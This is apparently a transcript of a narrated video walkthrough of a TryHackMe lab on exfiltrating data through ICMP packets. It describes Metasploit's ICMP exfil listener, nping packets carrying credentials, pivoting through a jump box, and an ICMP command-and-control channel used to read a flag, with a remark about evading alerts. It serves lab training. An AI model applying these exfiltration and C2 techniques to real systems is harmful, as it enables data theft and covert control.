Hey guys, so we're going to be doing data exfiltration here. I've already started my machine and we are ready to get started here. We're going to be doing task 7 for exfiltration of ICMP traffic. So basically, essentially, you have your ICMP packet, and in your ICMP packet, there is a data section. You can store data you want to exfil in that data section. Right here it is here. If you look in Wireshark and you're looking at a packet, here's the data section, and you can actually store data within the ICMP packet you want to exfil. So what we're going to do is we're going to actually use the attack box. I'm very much against this, but I'm going to show you how do you do it with the attack box, then afterwards I'm going to show you why I did it with the attack box, because it's very rare I use the attack box unless there's an issue with the Metasploit room, um, with the Metasploit module. So I'm going to go ahead and start the attack box. I'm going to walk you through it, and I actually recommend you go through it with me using the attack box. This is a very rare time where you'll hear me say that, because most of the time I like to recommend you use your own attack box. So you could install the tools and you can use them for in the future, and you don't just have it sitting on TryHackMe's attack box that will eventually get deleted, and then you'll lose all that work that let's say you wanted to download those tools, you won't have them essentially. So we'll wait for it to start, and while it's starting, I could explain this a little bit more thoroughly. So, sorry. All right. So you have the ICMP echo request, and there will be an echo reply, okay? And like I mentioned, you can store data in the data section of a packet. And in this example, they're doing echo them, TryHackMe, and what they're doing is they're taking this value and they're turning it into hex, okay? And then they're going from the, they're then going to ping, and they're going to pass this hex text, which contains them TryHackMe, which is a username and password. So when you observe that in Wireshark, you can actually see that here, okay? So just going through it more thoroughly. And then for ICMP data exfiltration, when you're using the Metasploit ICMP exfil module, what you're doing is you're going to set up your ICMP exfil module listener with MSF console. And then once you have that listening from the victim machine, so let's say you're SSH'd into the victim machine, you're then going to send a packet from the victim to the attack box, okay? But when you send that initial packet, it's gonna, let me just expand this out a little bit as well, because I'm all stuck in here. All right, and so when you send that initial packet, it's gonna have a BOF. So the BOF is just a label that says, hey, MSF console ICMP exfil module, start collecting this data, right, to trigger. And then next you pass it the data you want to collect. And to kind of talk more about that, we'll scroll down here. So here we're passing it the admin password. And then after that, we're going to close this session by saying, by having the label EOF. So EOF will indicate to the MSF ICMP exfil module to stop collecting. And then after that, you'll have the data, okay? Now that's great, and we'll run it using the attack box, which I really don't like doing, but we're gonna do it because it works. And then afterwards, I'm gonna show you how to do it from the victim machine to your own attack box. So I'll show you how to do that as well, and that'll help you understand it a little bit more. So what I'm gonna do is I am just going to follow their instructions here. And initially what they're going to tell you to do is to set up or to start the MSF console. So I'm going to do that. And it's already got you logged in as root. So by the way, if you tried to do this on your own machine, on your own Kali box, you'd have to do sudo right? When you open up the MSF console, you can't use the regular user. But in this case, they already have us using root. So I'm going to just type this out because it might just be easier to do it that way than to paste it. Actually, why don't we paste it? Why don't we paste it? You guys don't want to see me doing typos all day. So I'm just gonna go grab this, paste that in, copy that, come over here, paste it in, and start my MSF console, MSF console, and we'll give that a second, and then we'll try it again. Okay. Usually this takes a while, so this is nothing new. And we're in. Okay, now I'm gonna paste this in. And then after I paste that in, I'm going to run this command here. Paste that in. And you can see, actually, hold on, sorry about that. Let me just delete that. I forget that they make you use this part right here, this little clipboard. All right, now I should be able to paste that in. All right, and you can see how it says attack box IP. That's the IP address that is right up here in the upper right-hand corner. So you see 10.10.33.168. Okay. And after you do that, then you're gonna set the interface, which I'll just type out. ETH0. Okay, and then after that, we're going to run it. Let me move that out of the way. We're going to run it. Right, so we're having the module start listening. And next we're going to SSH into our victim. So I'm gonna grab that, come over here, SSH into the victim. And before you SSH into the victim, you actually have to SSH into the jump box. So the jump box is just how we initially gain access to the network, if you could think of it that way. It's the first machine that we exploited. Then from that machine, we're able to vertically or horizontally move through their network. And in this case, we were able to compromise one machine, then move from that machine to another machine. So we're kind of like kind of pivoting in a sense. All right, so let me bring up my notes real quick. I got to SSH into this here. And let me scroll up to see what our victim IP address is. I'll copy that down. Okay. All right. So I'm gonna SSH and username is thm at 10.10.1. This is a jump box that we're getting into. So we initially gain access to this machine and the password is try hack me. And then we're in. So now from this machine, we're going to go and SSH into another machine, which is going to be the SSH thm ICMP .thm.com. So I'm going to go ahead and paste that in here. So I don't have any typos. All right, that go away. Paste it in there. And so now we're SSHing from one machine into another machine. And I'm going to say yes. Try hack me. All right, and then I'm in that machine now. Now from that machine, I'm going to go ahead and send a file through ICMP, which is going to initiate our session in a sense. So sudo nping which is a tool that they've already installed on this host, ICMP host. And we're using ICMP C1 to only send one packet. Then we're going to specify the attack box IP address, which is, if we're the attacker, it's going to be 10.10.33.168. And I really hope they change this background because that doesn't look cool. Anyhow, let me go ahead and move off to the right. And you can see the BOF file.txt. That's gonna be our trigger. So when I send this ping back to our attack box, it's gonna trigger the attack box to start listening. Okay, so that looks good. Then minimize that, paste that in, and then send it. It's asked for the password, so try hack me. There's other tools out there that you can use that won't ask for the password. Those are probably the ones you're going to want to use in a real world scenario. And I think I saw the browser open and I can show you which tools those are. I'm definitely going to take note of those. So let's see here. This way. All right, so that should have, whoa, what's going on here? Saying it's going to expire soon. Yeah, it shouldn't expire soon. I hope it doesn't expire soon. I'll be pretty upset if it does. All right, so let's see here. Did it capture anything? Because if this doesn't work, we'll just try something else. But yeah, it says beginning of capture file dot text. So it's seen the BOF and then it triggered and then it started collecting that file dot text. So it looks like this is working, and we'll try to make this even quicker because apparently my session is going to expire. So we'll just run through this. We've got the next command right here, which is going to send the data as a string. And I'm just gonna paste that in here. And again, I'm gonna change the attacker IP address to the IP address of my attack box. 168. And then I'm gonna send it. Paste. All right. And so we sent that. And then next we are going to send the next command here. And if this doesn't work, then I will show you how to analyze it in Wireshark. Next best thing, honestly. And that seemed to work for me. So we'll change this to the attack box again. 10.10.33.168, right? Paste that in there, send it. And then next, and let me make sure I did this right, ETH0. Oh, snaps, I'm missing one. I'm missing, oh no, everything looks good. It's got Etherface, ETH0. Oh man, what is going on here? It's not even getting anything yet. All right, we'll send the next one. Oh, hopefully it starts to compute here. See, paste. Right, attack box IP. All right, gotcha. And I'm just gonna get out of the way, paste that in, run it. All right, and yeah, it seemed to work now. So now if we go here, loot file, and then it's given us the path of the loot file. So what I can do is I can then cat that file out. So I'm gonna copy and open up another terminal here. See if I cat that file out here. Paste that in. And then you can see it's catted the file out. So we got the content of the file and it seems to be working. right? So that's great. It worked. What do you do in a situation it doesn't work? I'm going to show you. What do you do in a situation where, for some reason, MSF console ICMP exfil isn't working? Okay. Well, you have other options, and those other options would be to use your own attack box that has a really cool screensaver, right? So in this situation, I try to get it to work and it didn't. Uh, Unfortunately, it just did not work. And let me go ahead and minimize this because that wasn't the only console I had open. I had other ones open where I tried to try to get it to work, like this one right here, where I specified everything. They told me to specify I use ton zero instead of E0, of course, because you're using your own attack box. Um, you know, and everything was set. Didn't work. So let me go and close that one out too. Or actually, we'll just minimize it. I don't like closing out my windows because I take notes afterwards. So what I did was I just opened up Wireshark, right? And I did the same exact thing. I SSH'd into the victim, like you see here. And I think it might have just stopped my session. It did. That's fine because we're going to move on to the next one. I was going to show you that anyways. So I'll just have to restart it. But what I did was, move this out of the way. So from the victim, right? So I was able to SSH into this same machine, right? Or actually, I'm looking at the wrong one. Gosh. Huh, where is it? Oh, is this it right here? Yeah, this is it right here. So this is the victim machine, right? So you SSH to the jump box, then from the jump box you go into the other machine. Expand this out. We SSH into the ICMP and then what we do is we send an ICMP, except in this case we're using this attack box IP address. You can use your own with ton zero, right? And so that's what I did. I specified I wanted to use my own IP, and I think I still have the history of that here, so I can show you exactly what I did. Here it is. Okay. So from here, what I did, scroll up. I tried it a bunch of times. I did a sudo nping, and then this command here, basically the same thing, except I use my ton zero IP. Okay. And I sent this BOF file. It didn't trigger the ICMP exfil module to start listening for some reason, but it did get Wireshark to start listening. And so Wireshark was listening for ICMP packets, right? And I had it open, and what you do is you just open up Wireshark like this, right? You open it up, and then you choose your Ethernet. So choose ton zero if you're using your own attack box. So you open that up. You send, I'm just going to close that out. You send that ICMP, send both of them, send the first one, start it. And you don't really need to start because you're not using MSF console. So you could actually just go straight to sending the data like this. Sudo nping dash dash ICMP space dash C1. So we're saying one packet, IP address of your attack box, dash dash data string, because you're sending a string, and then quotes admin colon password, right? And you can see here that if I looked at the traffic from ton zero, I received an ICMP ping from the victim. And when I looked at the data section, guess what was there? Admin password. So it worked. I didn't even have to encode it. It just worked. So this is another option. And in this scenario, the only thing you need to have is nping on the victim machine. Now, what if, in this case, nping requires you to have sudo privileges? What if you're on a victim machine, they don't have sudo privileges? Well, that's when you pull out Google and you look for other tools. I was able to find this other tool here, and it's called ICMP Exfil, and it essentially does the same thing. But when you exfil data, you exfil it as ASCII, and you use their specific ping py files, their Python file, from the victim machine. And on your attack machine, you serve up the server Python file, and it will listen for that specific ping coming from that specific ping.python file from the victim. And when it sees it, it will then capture that data as ASCII. And then you could use the ASCII converter to convert that over and see what is in the data, right? Very cool tool. It's legit. You know, if anything has MIT license associated with it, and it has like a lot of forks, a lot of stairs, it's legit. It's pretty legit. So I'll just move this over here. And I also looked through the Python code, and it looks good. So that's one option. And now we're going to be reading what are the other options that they give you there. So let me move this aside. And for this first flag, you can go ahead and put data, right? So looking at the actual Wireshark packet, you can see this data section. That is where the data is stored that you're trying to exfil. So that's where it is. Okay. Follow the techniques discussed in this task to establish a C2 ICMP connection between the jump box and the ICMP host. Then execute the get flag command. What is the flag? All right, so this portion right here is sounds complicated, but it's really not. So let me go ahead and just exit out of this because apparently it just terminated my machine. So I'm just going to terminate this machine here. And I'm going to restart. I'm going to probably refresh my browser here. So let me just go ahead and split that. I'm going to refresh this here. And then I'm going to go to, okay, that's odd. So now it's saying that my machine's good. Okay, so anyhow, let me just open up their attack box here, start the attack box. Or you know what? Let's close the attack box, right? I only used it because it worked for that specific scenario. I never like using the attack box. I'm very much against it. So I'm going to use my own, and I'm going to show you how I did it. And this is going to be good for my notes as well. So go here. Let's run through that task. And scroll down. All right, so ICMP C2. So what we can do is we can have our C2 server send a ICMP request to our victim. Our victim will then reply to that request. So it's basically us sending a command. For instance, I'm sending from my C2 server the command hostname. Now, if you type hostname into, any terminal, what will happen is you'll input hostname and the output will be Windows 2010, or it'll be Kali for your Kali Linux machine, right? Well, in this case, we send that command to remote host to the victim. That victim then replies back with the output. So then we can see the output of that command that ran on their machine, okay? And so he sends the sudo ICMP door, and then you're mapping the IP address of your victim here. All right, and from the victim here, you're going to, or actually, I'm sorry. So from the victim, this is actually what you're doing. You're actually running this command on the victim, and then you're mapping the IP address of the C2 server. Okay, so the attacker. Then from the attacker's machine, you're going to send your command, right? And you're going to map the IP address of your victim. So they're mapped to one another, so that when you send your command from your C2 server to your victim can then reply back with the output, okay? And that's essentially what's happening. So that's exactly what we're going to do. And the first thing we have to do is we have to SSH into our jump server. So SSH and then the IP address of my jump server, which is provided up here. Oh, I forgot the @ symbol. Paste. And they provided me the password, so try hack me. And then I'm in. So then I'm going to open up another one. And from this one, I'm going to SSH into my attack box again, or my jump box, right? So, which in this case, we're just using it as like a C2 server for this example. All right, so I have 2 sessions open, and then from this one, I'm actually going to go from my jump box to the victim, which in this case is the ICMP host. So I'm going to grab that, copy, go to the ICMP host, so SSH, and paste that in. Yes. Try hack me. They provided me the password, and then I'm in. So on this window, I'm in the ICMP host. All right, now so from the victim, the first thing we have to do is we have to set up we have to map out which destination we want to send our replies to, right? So I'm going to do the same thing here. So I'm going to run both commands here so you can understand what I'm doing. So I'm going to do ifconfig and ifconfig. All right. So here we can see in this example, they've mentioned that you're using a 192.168 address for these. So you can see here for my jump box, the 192.168.0.133. So what I'm gonna do is I'm gonna take the command that they provided me here to run from the victim. Right, I'm gonna paste that in here. And then I'm going to make sure that I map the IP address of the jump box, which in this case is acting as a C2 server. Okay, and then I'm going to go ahead and input that. And then it's going to require you to put your password in. All right, and then you'll see it kind of just pauses there, and that's perfectly normal. And then from the jump box, we're going to run this other command here, this one, copy that. So this is our C2 server, quote unquote. And then I'm going to input the IP address of the ICMP host, which in this case is 0.121. So that's already set actually. And it looks like that was already set too. Okay, perfect. So I'm gonna enter that, put in the password. All right, and we're in shell. So shell. So now what it's allowing me to do is I'm able to send this command, hostname. I want to see the host name of my victim. So I'm going to send this command to my victim, hostname. So there's a attack box right here on the left, victim on the right. And then so I send that, and then it replies back with ICMP host, right? And that's the name of it. That's the name of the victim right there. So reply back, and I see the reply. Now, I want to go ahead and query it for the flag. So get flag, just like they specify down here where they say, make sure you say get flag, right? And then it says, hey, check this directory, temp flag.txt. So now that I know where that directory is, I'm going to say, okay, I'm going to send another command, cat, and we're just sending regular commands, and we're seeing the output. Paste. And then we got the flag. There it is. Right. So that's the flag that gets copied, that gets put in my description of my video. And if you'd like to see more videos, please like and subscribe. This one took me a good minute because I really wanted to just replicate it on my attack box, but that first portion wasn't working. The second portion, it worked, but it took me a second to understand that I need to use the ETH1 from the jump box interface and then ETH0 from the victim interface. So anyhow, that goes there. I think I'm good for today. That's probably this is gonna be the last one I do. I think this one's so interesting because the fact that you can use a tool from your jump box like they show you here, right? So we can use this. Where is it here? I could have swore I had it open. Hold on one sec. Oh, here we go. I closed my window. So if we scroll up, I have this really cool tool, and I'm definitely gonna download it. It's the nping, I believe is what it's called, right? And if you get that on a victim machine, you can then have them send, right? You can have them send this nping tool packets to your server, to your C2, to your attack box, right? That's a really cool tool. And then after doing some research, I was able to find my own tool, which is probably a lot better. The ICMP exfil that uses Python files. And you can actually send back your text in ASCII, which might not cause some alerts, you know? So that's that. I hope you guys enjoyed the video. Please like and subscribe for more content. All right, Danny out.